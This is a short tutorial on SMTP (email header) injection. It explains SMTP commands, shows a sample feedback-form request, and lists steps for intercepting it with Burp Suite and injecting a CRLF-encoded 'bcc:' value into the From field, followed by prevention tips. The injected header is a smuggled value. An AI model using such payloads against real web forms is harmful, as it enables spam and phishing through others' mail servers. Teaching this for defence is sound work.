SMTP Injection

SMTP stands for Simple Mail Transfer Protocol. It is an application layer protocol that handles the sending, receiving, and forwarding of emails on the server. A client that wants to send an email first opens a TCP connection to the SMTP server and sends an email over that connection.

 

Example:

Suppose there is an application requesting the following form to submit feedback:

POST feedback.php HTTP/1.1
Host: lazyroar.com
Content-Length: 70
From=gfglover@gmail.com & Subject=GFG+Site+feedback
& Message=love+lazyroar+3000

After submitting the input, the web application executes the SMTP program using the following command:

• MAIL – Used to initiate sender.
• RCPT – This command includes all email addresses of recipients.
• DATA – This contains email data.

MAIL FROM:gfglover@gmail.com

RCPT TO:feedback@lazyroar.com

DATA
From: gfglover@gmail.com
To:feedback@lazyroar.com
Subject:GFG Site feedback
love lazyroar 3000
.

SMTP injection is an attack technique where hackers exploit an application’s mail and web servers, and if the input is not carefully protected, then hackers can send emails to targeted users. Hackers do this to send phishing emails and any type of malicious attachments.

Steps Performed to perform SMTP Injection attack:

• Step 1: Enter details in the feedback form as shown in the SMTP example above.
• Step 2:  Use any interception tool such as Burp Suite to intercept the request you make.
• Step 3: Inject malicious input into this capture request.
• step 4: Now send the infected email request as shown below.

POST feedback.php HTTP/1.1
Host: lazyroar.com
Content-Length: 70
From=gfglover@gmail.com%0d%0a 
bcc:hackername%40hacker.com & Subject=Site+
feedback & Message=love+lazyroar+3000 

Preventive Measure:

• Use input validation techniques such as whitelisting to filter input.
• Newline characters are not allowed or rejected.
• There are many email libraries that can be used to automatically defend against this type of attack.
• Never trust user input. So test all possible inputs.